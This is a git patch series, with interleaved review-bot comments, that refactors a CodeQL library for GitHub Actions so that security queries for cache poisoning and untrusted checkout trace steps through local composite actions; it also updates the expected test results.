@@ -74,25 +74,15 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { Input getInput(string inputName) { result = super.getInput(inputName) } - LocalJob getACaller() { result = super.getACaller() } + LocalJob getACallerJob() { result = super.getACallerJob() } + + UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -/** - * An `runs` mapping in a custom composite action YAML. - * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ -class Runs extends AstNode instanceof RunsImpl { - CompositeAction getAction() { result = super.getAction() } - - Step getAStep() { result = super.getAStep() } - - Step getStep(int i) { result = super.getStep(i) } -} - /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. 
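Review bot: `CompositeAction.getACaller()` is renamed to `getACallerJob()` with no alias left behind, and the qlpack metadata earlier in this series names the library `github/actions-all`, so queries written against the published pack would stop compiling. Keeping the old name for a release avoids that: `deprecated LocalJob getACaller() { result = this.getACallerJob() }`. The two new predicates also have no QLDoc; a one-line comment on each stating that the caller is found by matching a `uses:` step against this action's path would help readers of the public API.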
@@ -213,12 +203,26 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -class LocalJob extends Job instanceof LocalJobImpl { +abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { Step getAStep() { result = super.getAStep() } Step getStep(int i) { result = super.getStep(i) } } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends StepsContainer instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } +} + +/** + * An Actions job within a workflow which is composed of steps. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class LocalJob extends Job, StepsContainer instanceof LocalJobImpl { } + /** * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. @@ -230,6 +234,8 @@ class Step extends AstNode instanceof StepImpl { If getIf() { result = super.getIf() } + StepsContainer getContainer() { result = super.getContainer() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9416b39e105..5c07a61e66e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
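Review bot: The new public class `StepsContainer` has no QLDoc, although `Runs`, `LocalJob` and `Step` around it all carry one. A comment such as `/** A node that directly holds a sequence of steps: the runs mapping of a composite action, or a local job. */` would say which nodes qualify. The `Runs` comment moved in this hunk still reads "An `runs` mapping" and could become "A `runs` mapping" while it is being touched. `Step.getContainer()` in the last hunk of this file would also benefit from a one-line description.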
@@ -301,8 +301,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { result.getNode().getValue() = name } - LocalJobImpl getACaller() { - exists(LocalJobImpl caller, string gwf_path, string path | + LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } + + UsesStepImpl getACallerStep() { + exists(UsesStepImpl caller, string gwf_path, string path | // the workflow files may not be rooted in the parent directory of .github/workflows // extract the offset so we can remove it from the action path gwf_path = @@ -312,8 +314,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { .getRelativePath() .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getAStep().(UsesStepImpl).getCallee() = - path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and result = caller ) } @@ -327,7 +328,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { private predicate hasExplicitWritePermission() { // a calling job has an explicit write permission - this.getACaller().getPermissions().getAPermission().matches("%write") + this.getACallerJob().getPermissions().getAPermission().matches("%write") } /** Holds if the action is privileged. */ @@ -340,10 +341,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { or // there is a privileged caller job ( - this.getACaller().isPrivileged() + this.getACallerJob().isPrivileged() or - not this.getACaller().isPrivileged() and - this.getACaller().getATriggerEvent().isPrivileged() + not this.getACallerJob().isPrivileged() and + this.getACallerJob().getATriggerEvent().isPrivileged() ) } 
@@ -351,7 +352,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable exists(JobImpl caller, EventImpl event | - caller = this.getACaller() and + caller = this.getACallerJob() and event = caller.getATriggerEvent() and event.isExternallyTriggerable() and // the action is privileged @@ -433,33 +434,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } } -class RunsImpl extends AstNodeImpl, TRunsNode { - YamlMapping n; - - RunsImpl() { this = TRunsNode(n) } - - override string toString() { result = n.toString() } - - override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - - override CompositeActionImpl getParentNode() { result.getAChildNode() = this } - - override string getAPrimaryQlClass() { result = "RunsImpl" } - - override Location getLocation() { result = n.getLocation() } - - override YamlMapping getNode() { result = n } - - /** Gets the action that this `runs` mapping is in. */ - CompositeActionImpl getAction() { result = this.getParentNode() } - - /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } - - /** Gets the step at the given index within this job. */ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } -} - class InputsImpl extends AstNodeImpl, TInputsNode { YamlMapping n; 
@@ -946,14 +920,57 @@ class JobImpl extends AstNodeImpl, TJobNode { } } -class LocalJobImpl extends JobImpl { +abstract class StepsContainerImpl extends AstNodeImpl { + /** Gets any steps that are defined within this job. */ + abstract StepImpl getAStep(); + + /** Gets the step at the given index within this job. */ + abstract StepImpl getStep(int i); +} + +class RunsImpl extends StepsContainerImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. */ + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } + + /** Gets the step at the given index within this job. */ + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } +} + +class LocalJobImpl extends JobImpl, StepsContainerImpl { LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. 
*/ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } } class StepImpl extends AstNodeImpl, TStepNode { @@ -965,7 +982,10 @@ class StepImpl extends AstNodeImpl, TStepNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - override JobImpl getParentNode() { result.getAChildNode() = this } + override AstNodeImpl getParentNode() { + result.getAChildNode() = this and + (result instanceof LocalJobImpl or result instanceof RunsImpl) + } override string getAPrimaryQlClass() { result = "StepImpl" } @@ -981,12 +1001,37 @@ class StepImpl extends AstNodeImpl, TStepNode { /** Gets the value of the `if` field in this step, if any. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the Runs or LocalJob that this step is in. */ + StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() } + /** Gets a step that follows this step. */ StepImpl getAFollowingStep() { - exists(LocalJobImpl job, int i, int j | - job.getStep(i) = this and - result = job.getStep(j) and - i < j + ( + // next step in the same job + exists(LocalJobImpl job, int i, int j | + job.getStep(i) = this and + result = job.getStep(j) and + i < j + ) + or + // next steps in a composite action + exists(RunsImpl runs, int i, int j | + exists(this.getEnclosingCompositeAction()) and + runs.getStep(i) = this and + result = runs.getStep(j) and + i < j + ) + or + // next steps of the caller (in a composite action step) + result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() + or + // if any of the next steps is a call to a local composite actions, we should follow it + exists(LocalJobImpl job, int i, int j, CompositeActionImpl a | + job.getStep(i) = this and + i < j and + a.getACallerStep() = job.getStep(j) and + result = a.getRuns().getAStep() + ) ) } } 
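Review bot: StepsContainerImpl has no QLDoc and its two member comments still say "within this job", which is wrong for the `runs` mapping of a composite action; the same wording is repeated on the RunsImpl overrides. Suggested: `/** A node that holds a list of steps: a job with a steps key or the runs mapping of a composite action. */` on the class, and `/** Gets any step defined in this container. */` and `/** Gets the step at index i in this container. */` on the members. The bodies of getAStep and getStep are identical in RunsImpl and LocalJobImpl, so they could be written once if the abstract class can reach the underlying mapping.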
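Review bot: getContainer() compares the container's node with `n.getParentNode()`, but by the getAStep definitions above a step node is an element of the `steps` sequence, so its YAML parent is that sequence rather than the job or `runs` mapping, and the predicate probably has no result. Defining it through the container's own accessor avoids depending on YAML nesting: `StepsContainerImpl getContainer() { result.getAStep() = this }`. Separately, the last disjunct of getAFollowingStep binds `job` as a LocalJobImpl, so a composite action called from inside another composite action's steps is not followed. StepImpl's body starts and ends outside the hunk.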
From 44911382afd952d5052184e8ac552cb5446b1852 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:49:05 +0200 Subject: [PATCH 0415/1267] feat(tests): Update tests results
--- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+)
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index ce6d75bf113..60f3370f6d1 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
@@ -365,5 +365,6 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From c1d8ca09768247604b16f342fb630ee7aa2319d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 00:01:49 +0200 Subject: [PATCH 0416/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4b237b4bfd3..f5cf222d25c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.19 +version: 0.1.20 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4d522db3f98..6def1dfc0c8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.19 +version: 0.1.20 groups: [actions, queries] suites: codeql-suites extractor: javascript From cc64c95dbc498be84227bf27126600a9600f3416 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:28:47 +0200 Subject: [PATCH 0417/1267] feat(dataflow): Update edges predicate to only link to next step Previously each step was linking to all possible following steps. This change makes a better flow path explanation flowing from the checkout to the poisonable step, step by step --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 52 +++-- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 92 -------- .../UntrustedCheckoutTOCTOUCritical.expected | 5 - .../UntrustedCheckoutCritical.expected | 207 +----------------- 8 files changed, 42 insertions(+), 322 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5c6cdc141ee..23832b35bd5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -236,6 +236,8 @@ class Step extends AstNode instanceof StepImpl { StepsContainer getContainer() { result = super.getContainer() } + Step getNextStep() { result = super.getNextStep() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c07a61e66e..e920a558c73 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll 
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1002,23 +1002,43 @@ class StepImpl extends AstNodeImpl, TStepNode { IfImpl getIf() { result.getNode() = n.lookup("if") } /** Gets the Runs or LocalJob that this step is in. */ - StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() } + StepsContainerImpl getContainer() { + result = this.getParentNode().(RunsImpl) or + result = this.getParentNode().(LocalJobImpl) + } + + StepImpl getNextStep() { + // if step is a uses step calling a local composite action, we should follow the called step + this instanceof UsesStepImpl and + exists(CompositeActionImpl a | + a.getACallerStep() = this and + result = a.getRuns().getStep(0) + ) + or + // if step is the last step in a composite action, we should follow the next step in the caller + exists(RunsImpl runs, StepsContainerImpl caller_container, StepImpl caller, int i | + this.getContainer() = runs and + runs.getStep(count(StepImpl s | runs.getAStep() = s | s) - 1) = this and + runs.getEnclosingCompositeAction().getACallerStep() = caller and + caller.getContainer() = caller_container and + caller_container.getStep(i) = caller and + caller_container.getStep(i + 1) = result + ) + or + // next step in the same job/runs + exists(int i | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(i + 1) + ) + } /** Gets a step that follows this step. */ StepImpl getAFollowingStep() { ( - // next step in the same job - exists(LocalJobImpl job, int i, int j | - job.getStep(i) = this and - result = job.getStep(j) and - i < j - ) - or - // next steps in a composite action - exists(RunsImpl runs, int i, int j | - exists(this.getEnclosingCompositeAction()) and - runs.getStep(i) = this and - result = runs.getStep(j) and + // next steps in the same job/runs + exists(int i, int j | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(j) and i < j ) or 
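Review bot: getNextStep() has no QLDoc while the predicates around it do, and its return-from-action branch goes up one level only. When the calling step is itself the last step of its container, `caller_container.getStep(i + 1)` has no result, so the edge chain ends inside the action instead of resuming in an outer caller; nested local composite actions would then show a truncated path. A `uses` step that calls a local action also satisfies the same-container branch, so it gets two successors (the action's first step and the step after the call), which may or may not be wanted for path display. Suggested comment: `/** Gets the step that runs immediately after this one, entering a called local composite action and resuming after its caller step. */`. StepImpl's body starts and ends outside the hunk.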
@@ -1026,10 +1046,10 @@ class StepImpl extends AstNodeImpl, TStepNode { result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() or // if any of the next steps is a call to a local composite actions, we should follow it - exists(LocalJobImpl job, int i, int j, CompositeActionImpl a | - job.getStep(i) = this and + exists(int i, int j, CompositeActionImpl a | + this.getContainer().getStep(i) = this and + this.getContainer().getStep(j) = a.getACallerStep() and i < j and - a.getACallerStep() = job.getStep(j) and result = a.getRuns().getAStep() ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 607a13e142c..3b69110ed12 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -17,7 +17,7 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 2656b22e1e3..a97309ce187 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -16,7 +16,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where 
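Review bot: The `edges` predicate in CachePoisoning.ql now follows getNextStep(), but the `where` clause that relates the checkout to the flagged step lies outside the hunk and may still use getAFollowingStep(). The two relations are not obviously equivalent (getAFollowingStep() recurses through callers, getNextStep() returns one level), so an alert whose flagged step is not reachable through `getNextStep+()` would be reported without a connecting path; a test with a checkout inside a nested local composite action would settle it. The identical one-line change is made in UntrustedCheckoutTOCTOUCritical.ql and UntrustedCheckoutCritical.ql, so the three copies of `query predicate edges(Step a, Step b) { a.getNextStep() = b }` could live once in a module the queries import.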
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 02054ebbf0a..2026a784d05 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -18,7 +18,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from PRHeadCheckoutStep checkout, PoisonableStep s where diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index eb1412bf0e2..994beb3b74f 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,159 +1,67 @@ edges | .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | 
.github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| 
.github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 
| Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | 
.github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | 